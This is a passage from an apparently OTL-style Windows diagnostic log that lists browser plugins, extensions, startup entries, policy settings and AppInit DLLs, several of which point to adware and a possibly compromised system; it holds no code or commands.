FF - HKLM\Software\MozillaPlugins\@Google.com/GoogleEarthPlugin: C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)

FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.55.2: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)

FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.55.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)

FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found

FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3502.0922: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3508.1109: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3538.0513: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3555.0308: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@nexon.net/NxGame: C:\ProgramData\NexonUS\NGM\npNxGameUS.dll (Nexon)

FF - HKLM\Software\MozillaPlugins\@nullsoft.com/winampDetector;version=1: C:\Program Files (x86)\Winamp Detect\npwachk.dll (Nullsoft, Inc.)

FF - HKLM\Software\MozillaPlugins\@oberon-media.com/ONCAdapter: File not found

FF - HKLM\Software\MozillaPlugins\@pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll File not found

FF - HKLM\Software\MozillaPlugins\@soe.sony.com/installer,version=1.0.3: C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\t1p05fwg.default\extensions\{000F1EA4-5E08-4564-A29B-29076F63A37A}\plugins\npsoe.dll File not found

FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)

FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)

FF - HKLM\Software\MozillaPlugins\@WildTangent.com/GamesAppPresenceDetector,Version=1.0: C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\3\NP_wtapp.dll ()

FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)

FF - HKCU\Software\MozillaPlugins\@nsroblox.roblox.com/launcher: C:\Program Files (x86)\Roblox\Versions\version-ca7bb36aabe54be5\\NPRobloxProxy.dll ()

FF - HKCU\Software\MozillaPlugins\@powerchallenge.com/PowerLoader: C:\Users\Owner\AppData\LocalLow\POWERC~1\nppowerloader.dll (Power Challenge Sweden AB)

FF - HKCU\Software\MozillaPlugins\@Skype Limited.com/Facebook Video Calling Plugin: C:\Users\Owner\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll (Skype Limited)

FF - HKCU\Software\MozillaPlugins\@talk.google.com/GoogleTalkPlugin: C:\Users\Owner\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)

FF - HKCU\Software\MozillaPlugins\@talk.google.com/O1DPlugin: C:\Users\Owner\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)

FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Users\Owner\AppData\Local\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)

FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Users\Owner\AppData\Local\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)

FF - HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0: C:\Users\Owner\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)

FF - HKCU\Software\MozillaPlugins\anvisoft.com/AdblockPlugin: C:\ProgramData\Anvisoft\Anvi Smart Defender 2\extensions\npAdblockPlugin.dll (Anvisoft)

FF - HKCU\Software\MozillaPlugins\pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll File not found

FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{000a9d1c-beef-4f90-9363-039d445309b8}: C:\Program Files (x86)\Google\Google Gears\Firefox\ [2010/04/03 18:24:02 | 000,000,000 | ---D | M]

FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\smartwebprinting@hp.com: C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 [2010/04/13 18:41:37 | 000,000,000 | ---D | M]

FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}: C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_20.1.0.24\coFFPlgn\ [2014/05/26 00:10:30 | 000,000,000 | ---D | M]

FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\lesstabs@lesstabs.com: C:\Program Files (x86)\Mozilla Firefox\extensions\lesstabs@lesstabs.com

FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{BBDA0591-3099-440a-AA10-41764D9DB4DB}: C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_20.1.0.24\IPSFF [2013/10/13 18:28:09 | 000,000,000 | ---D | M]

FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{C7AE725D-FA5C-4027-BB4C-787EF9F8248A}: C:\Program Files (x86)\RelevantKnowledge\firefox

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 29.0.1\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components [2014/04/11 21:24:38 | 000,000,000 | ---D | M]

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 29.0.1\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins [2014/05/27 08:09:25 | 000,000,000 | ---D | M]

[2002/01/01 03:15:28 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Owner\AppData\Roaming\mozilla\Extensions

[2014/05/28 08:28:35 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Owner\AppData\Roaming\mozilla\Firefox\Profiles\47jsurhl.default-1385867679964\extensions

[2014/04/27 17:57:51 | 000,000,000 | ---D | M] ("CloudShare plugin for Firefox") -- C:\Users\Owner\AppData\Roaming\mozilla\Firefox\Profiles\47jsurhl.default-1385867679964\extensions\itst-firefox-plugin@itstructures.com

[2014/04/19 22:05:58 | 000,000,000 | ---D | M] (tinymediaplayer Support) -- C:\Users\Owner\AppData\Roaming\mozilla\Firefox\Profiles\47jsurhl.default-1385867679964\extensions\jid1-RYwhP9dQdGfXkQ@jetpack

[2014/05/27 08:08:04 | 000,000,000 | ---D | M] (SNT) -- C:\Users\Owner\AppData\Roaming\mozilla\Firefox\Profiles\47jsurhl.default-1385867679964\extensions\yieuo@fis-.org

[2014/05/15 20:06:35 | 000,371,488 | ---- | M] () (No name found) -- C:\Users\Owner\AppData\Roaming\mozilla\firefox\profiles\47jsurhl.default-1385867679964\extensions\client@anonymox.net.xpi

[2013/12/01 13:11:48 | 000,021,497 | ---- | M] () (No name found) -- C:\Users\Owner\AppData\Roaming\mozilla\firefox\profiles\47jsurhl.default-1385867679964\extensions\leethax@leethax.net.xpi

[2014/01/06 16:50:27 | 000,017,971 | ---- | M] () (No name found) -- C:\Users\Owner\AppData\Roaming\mozilla\firefox\profiles\47jsurhl.default-1385867679964\extensions\{c1970c0d-dbe6-4d91-804f-c9c0de643a57}.xpi

[2014/04/30 20:06:27 | 000,957,880 | ---- | M] () (No name found) -- C:\Users\Owner\AppData\Roaming\mozilla\firefox\profiles\47jsurhl.default-1385867679964\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi

[2014/05/25 19:26:03 | 000,001,014 | ---- | M] () -- C:\Users\Owner\AppData\Roaming\mozilla\firefox\profiles\47jsurhl.default-1385867679964\searchplugins\trovi-search.xml

[2014/05/25 19:26:03 | 000,007,855 | ---- | M] () -- C:\Users\Owner\AppData\Roaming\mozilla\firefox\profiles\47jsurhl.default-1385867679964\searchplugins\WebSearch.xml

[2013/05/24 15:05:58 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\extensions

[2013/04/11 17:48:38 | 000,000,000 | ---D | M] (Hotspot Shield Helper (Please allow this installation)) -- C:\Program Files (x86)\Mozilla Firefox\extensions\afurladvisor@anchorfree.com

[2014/05/03 14:36:57 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions

[2014/05/10 13:10:26 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}

========== Chrome ==========

CHR - default_search_provider: Google (Enabled)

CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:bookmarkBarPinned}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}{google:omniboxStartMarginParameter}ie={inputEncoding}

CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}sugkey={google:suggestAPIKeyParameter},

CHR - homepage: http://www.trovi.com...A8F1137B3&SSPV=

CHR - plugin: Error reading preferences file

CHR - Extension: Entanglement Web App = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\aciahcmjmecflokailenpkdchphgkefd\3.4.9_0\

CHR - Extension: Flicktion = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ahlonbncfpcjijmjkchpcbjbfanloaci\0.0.4_0\

CHR - Extension: Angry Birds = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\aknpkdffaafgjchaibgeefbgmgeghloj\1.5.0.7_0\

CHR - Extension: save on = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\balakjmegnjmgocoiikmpocclkilbiil\2.14\

CHR - Extension: Kaboom = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\beahobhgpojnjfdjglaehfhdanaioode\1.5_0\

CHR - Extension: Google Voice Search Hotword (Beta) = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn\0.1.1.5019_0\

CHR - Extension: Adblock Plus = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb\1.8.1_0\

CHR - Extension: Pandora = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\fbangkleohkafngihneedemihgfeikcl\1.0_0\

CHR - Extension: tinymediaplayer = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnnjbpfkbiophjcpjfhojffigapncemg\1.0_0\

CHR - Extension: Authy = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\gaedmjdfmmahhbjefcbgaolhhanlaolb\1.0.6_0\

CHR - Extension: Authy = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\gaedmjdfmmahhbjefcbgaolhhanlaolb\1.0.7_0\

CHR - Extension: Hola Better Internet = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\gkojfkhlekighikafcpjkiklfbnlmeio\1.3.403_0\

CHR - Extension: Hola Better Internet = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\gkojfkhlekighikafcpjkiklfbnlmeio\1.3.434_0\

CHR - Extension: YoutubeAdblocker = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\iicmcmnnjkkckalmfchmpcnommcckolc\1.0\

CHR - Extension: Little Alchemy = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\knkapnclbofjjgicpkfoagdjohlfjhpd\0.0.15.7_0\

CHR - Extension: AnviAdblock = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\lhmiofmipcpmhgihiecmpiekcacigpgb\1.0_0\

CHR - Extension: Poppit = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcbkbpnkkkipelfledbfocopglifcfmi\2.2_0\

CHR - Extension: Rain Alarm = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\meaikaglpfemjncbioflellmppndgmok\1.1.20_0\

CHR - Extension: christmas theme = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\mnfcgdpeaofnjiipbmdafbjjfjpdceel\1.2_0\

CHR - Extension: ROBLOX Outfit Saver Extension = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\mpaohnjlgfabcooefhihmafmdcbliakf\1.6.0_0\

CHR - Extension: SNT = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\mphagcbbnchmmbdpneljbjolhkkgoeak\2.1\

CHR - Extension: PlayBryte = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\neipakemjlgaoklhkealjjannpkccloa\1.0_0\

CHR - Extension: SaVe on = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\nfmolpfmkngcnbmoogplkkblmdkjolcm\2.14\

CHR - Extension: Google Wallet = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_1\

CHR - Extension: Google Quick Scroll = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\okanipcmceoeemlbjnmnbdibhgpbllgc\127\

CHR - Extension: YoutubeAdblocker = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pfiagcconkapemepmladlcppnelbpngf\1.0\

O1 HOSTS File: ([2014/04/27 16:07:22 | 000,000,000 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts

O2:64bit: - BHO: (no name) - ##TOOLBAR_DISABLED_##{F9E4A054-E9B1-4BC3-83A3-76A1AE736170} - No CLSID value found.

O2:64bit: - BHO: (sAve on) - {247C8BF4-6150-D2A7-EEA7-037A2265B307} - C:\Program Files (x86)\sAve on\ZQmJngjs4s.x64.dll ()

O2:64bit: - BHO: (YoutubeAdblocker) - {9344EB71-F5E0-A7D6-39BD-A44814EFFA4B} - C:\Program Files (x86)\YoutubeAdblocker\AyR5_S.x64.dll ()

O2:64bit: - BHO: (SNT) - {E289C34B-639B-FEBE-CF7B-47CE1B6284A5} - C:\Program Files (x86)\SNT\Xj.x64.dll ()

O2:64bit: - BHO: (DataMngr) - {F2D6C718-7E52-428E-8852-365C4B1A6E36} - C:\Program Files (x86)\Settings Alerter\Datamngr\x64\BrowserConnection.dll (Koyote-Lab, inc)

O2:64bit: - BHO: (no name) - {F9E4A054-E9B1-4BC3-83A3-76A1AE736170} - No CLSID value found.

O2 - BHO: (sAve on) - {247C8BF4-6150-D2A7-EEA7-037A2265B307} - C:\Program Files (x86)\sAve on\ZQmJngjs4s.dll ()

O2 - BHO: (Norton Identity Protection) - {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton Security Suite\Engine\20.4.0.40\coIEPlg.dll File not found

O2 - BHO: (Norton Vulnerability Protection) - {6D53EC84-6AAE-4787-AEEE-F4628F01010C} - C:\Program Files (x86)\Norton Security Suite\Engine\20.4.0.40\IPS\IPSBHO.DLL File not found

O2 - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)

O2 - BHO: (YoutubeAdblocker) - {9344EB71-F5E0-A7D6-39BD-A44814EFFA4B} - C:\Program Files (x86)\YoutubeAdblocker\AyR5_S.dll ()

O2 - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)

O2 - BHO: (SNT) - {E289C34B-639B-FEBE-CF7B-47CE1B6284A5} - C:\Program Files (x86)\SNT\Xj.dll ()

O2 - BHO: (DataMngr) - {F2D6C718-7E52-428E-8852-365C4B1A6E36} - C:\Program Files (x86)\Settings Alerter\Datamngr\BrowserConnection.dll (Koyote-Lab, inc)

O3:64bit: - HKLM\..\Toolbar: (no name) - 10 - No CLSID value found.

O3 - HKLM\..\Toolbar: (no name) - ##TOOLBAR_DISABLED_##{47833539-D0C5-4125-9FA8-0819E2EAAC93} - No CLSID value found.

O3 - HKLM\..\Toolbar: (Contribute Toolbar) - ##TOOLBAR_DISABLED_##{517BDDE4-E3A7-4570-B21E-2B52B6139FC7} - C:\Program Files (x86)\/Adobe Contribute CS4/contributeieplugin.dll ()

O3 - HKLM\..\Toolbar: (no name) - ##TOOLBAR_DISABLED_##{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No CLSID value found.

O3 - HKLM\..\Toolbar: (no name) - ##TOOLBAR_DISABLED_##{EF99BD32-C1FB-11D2-892F-0090271D4F88} - No CLSID value found.

O3 - HKLM\..\Toolbar: (Norton Toolbar) - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security Suite\Engine\20.4.0.40\coIEPlg.dll File not found

O3 - HKLM\..\Toolbar: (no name) - 10 - No CLSID value found.

O3 - HKCU\..\Toolbar\WebBrowser: (no name) - {1EED0937-BCCD-4F7B-96F7-EE6D485BAE2D} - No CLSID value found.

O3 - HKCU\..\Toolbar\WebBrowser: (no name) - {41534932-2D56-3600-76A7-7A786E7484D7} - No CLSID value found.

O3 - HKCU\..\Toolbar\WebBrowser: (Adobe PDF) - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)

O4 - HKLM..\Run: [] File not found

O4 - HKLM..\Run: [APSDaemon] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)

O4 - HKLM..\Run: [HKLM] C:\Windows\SysWOW64\install\server.exe (Microsoft Corporation)

O4 - HKLM..\Run: [hpsysdrv] c:\Program Files (x86)\Hewlett-Packard\HP Odometer\hpsysdrv.exe (Hewlett-Packard)

O4 - HKLM..\Run: [IAStorIcon] C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe (Intel Corporation)

O4 - HKLM..\Run: [KiesTrayAgent] C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe (Samsung Electronics Co., Ltd.)

O4 - HKLM..\Run: [LogMeIn Hamachi Ui] C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe (LogMeIn Inc.)

O4 - HKLM..\Run: [PlusService] C:\Program Files (x86)\Yuna Software\Messenger Plus!\PlusService.exe (Yuna Software)

O4 - HKLM..\Run: [QHSafeTray] C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe ()

O4 - HKCU..\Run: [CloudSystemBooster] C:\Program Files (x86)\Anvisoft\Cloud System Booster\CloudSystemBooster.exe (Anvisoft)

O4 - HKCU..\Run: [Clownfish] C:\Program Files (x86)\Clownfish\Clownfish.exe (Bogdan Sharkov)

O4 - HKCU..\Run: [File] C:\Program Files (x86)\Java\jre7\bin\javaw.exe (Oracle Corporation)

O4 - HKCU..\Run: [GoogleChromeAutoLaunch_721577D41E77D440C916E2687EBA0267] C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)

O4 - HKCU..\Run: [LightShot] C:\Users\Owner\AppData\Local\Skillbrains\lightshot\Lightshot.exe ()

O4 - HKCU..\Run: [MSDCSC] C:\Program Files (x86)\Java\jre7\bin\javaw.exe (Oracle Corporation)

O4 - HKCU..\Run: [SmileboxTray] C:\Users\Owner\AppData\Roaming\Smilebox\SmileboxTray.exe (Smilebox, Inc.)

O4 - HKCU..\Run: [Steam] C:\Program Files (x86)\Steam\steam.exe (Valve Corporation)

O4 - HKCU..\Run: [uTorrent] C:\Users\Owner\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc.)

O4 - HKCU..\Run: [Windows applicaton] C:\Users\Owner\AppData\Roaming\File Name.exe (ghaMJsw)

O4 - HKCU..\Run: [WindowsSystem] C:\Users\Owner\Documents\WindSys\ws.exe (Microsoft Corp.)

O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Activities present

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 0

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableLUA = 0

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: PromptOnSecureDesktop = 0

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: SoftwareSASGeneration = 1

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableLinkedConnections = 1

O7 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present

O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDesktopCleanupWizard = 1

O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145

O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0

O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDesktop = 0

O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableLUA = 0

O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: LogonHoursAction = 2

O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: DontDisplayLogonHoursWarnings = 1

O8:64bit: - Extra context menu item: Append Link Target to Existing PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)

O8:64bit: - Extra context menu item: Append to Existing PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)

O8:64bit: - Extra context menu item: Convert Link Target to Adobe PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)

O8:64bit: - Extra context menu item: Convert to Adobe PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)

O8:64bit: - Extra context menu item: Translate this web page with Babylon - res://C:\Program Files (x86)\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll/ActionTU.htm File not found

O8:64bit: - Extra context menu item: Translate with Babylon - res://C:\Program Files (x86)\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll/Action.htm File not found

O8 - Extra context menu item: Append Link Target to Existing PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)

O8 - Extra context menu item: Append to Existing PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)

O8 - Extra context menu item: Convert Link Target to Adobe PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)

O8 - Extra context menu item: Convert to Adobe PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)

O8 - Extra context menu item: Translate this web page with Babylon - res://C:\Program Files (x86)\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll/ActionTU.htm File not found

O8 - Extra context menu item: Translate with Babylon - res://C:\Program Files (x86)\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll/Action.htm File not found

O10:64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000009 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)

O10 - NameSpace_Catalog5\Catalog_Entries\000000000009 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)

O16:64bit: - DPF: {140E4DF8-9E14-4A34-9577-C77561ED7883} http://content.syste...ri_4.1.71.0.cab (Reg Error: Key error.)

O16 - DPF: {149E45D8-163E-4189-86FC-45022AB2B6C9} file:///C:/Program%20Files%20(x86)/Bejeweled%203/Images/stg_drm.ocx (SpinTop DRM Control)

O16 - DPF: {6A060448-60F9-11D5-A6CD-0002B31F7455} (ExentInf Class)

O16 - DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset...lineScanner.cab (Reg Error: Key error.)

O16 - DPF: {80B626D6-BC34-4BCF-B5A1-7149E4FD9CFA} http://zone.msn.com/...O1.cab60096.cab (UnoCtrl Class)

O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/...indows-i586.cab (Java Plug-in 10.55.2)

O16 - DPF: {924B4927-D3BA-41EA-9F7E-8A89194AB3AC} http://panda-plugin..../p3dactivex.cab (P3DActiveX Control)

O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} http://cdn2.zone.msn...k.cab102118.cab (MSN Games - Installer)

O16 - DPF: {CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_31)

O16 - DPF: {CAFEEFAC-0017-0000-0009-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.7.0_09)

O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 10.55.2)

O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.ad...Plus/1.6/gp.cab (Reg Error: Key error.)

O16 - DPF: {FFB3A759-98B1-446F-BDA9-909C6EB18CC7} http://utilities.pcp.../pcpitstop2.dll (PCPitstop Exam)

O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{CF96632F-9E52-4C44-9872-C8C04B9D8AD8}: DhcpNameServer = 192.168.1.1

O18:64bit: - Protocol\Handler\livecall - No CLSID value found

O18:64bit: - Protocol\Handler\ms-help - No CLSID value found

O18:64bit: - Protocol\Handler\ms-itss - No CLSID value found

O18:64bit: - Protocol\Handler\msnim - No CLSID value found

O18:64bit: - Protocol\Handler\skype4com - No CLSID value found

O18:64bit: - Protocol\Handler\wlpg - No CLSID value found

O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)

O20:64bit: - AppInit_DLLs: (C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll) - C:\Program Files (x86)\SearchProtect\SearchProtect\bin\SPVC64Loader.dll (Client Connect LTD)

O20:64bit: - AppInit_DLLs: (C:\PROGRA~3\Wincert\WIN64C~1.DLL) - File not found

O20:64bit: - AppInit_DLLs: (C:\PROGRA~2\SO_X64~1.BO~) - C:\Program Files (x86)\SO_x64.Booster ()

O20 - AppInit_DLLs: (C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC32Loader.dll) - C:\Program Files (x86)\SearchProtect\SearchProtect\bin\SPVC32Loader.dll (Client Connect LTD)

O20 - AppInit_DLLs: (c:\progra~2\settin~1\datamngr\iebho.dll) - c:\Program Files (x86)\Settings Alerter\Datamngr\IEBHO.dll (Koyote-Lab, inc)

O20 - AppInit_DLLs: (c:\progra~2\so0cb7~1.bo~) - c:\Program Files (x86)\SO.Booster ()

O20:64bit: - HKLM Winlogon: Shell - (Explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)

O20:64bit: - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)

O20:64bit: - HKLM Winlogon: UserInit - (C:\Users\Owner\Documents\WindSys\ws.exe) - C:\Users\Owner\Documents\WindSys\ws.exe (Microsoft Corp.)

O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)

O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysWOW64\userinit.exe (Microsoft Corporation)

O20 - HKLM Winlogon: UserInit - (C:\Users\Owner\AppData\Roaming\Microsoft\csrss.exe) - File not found

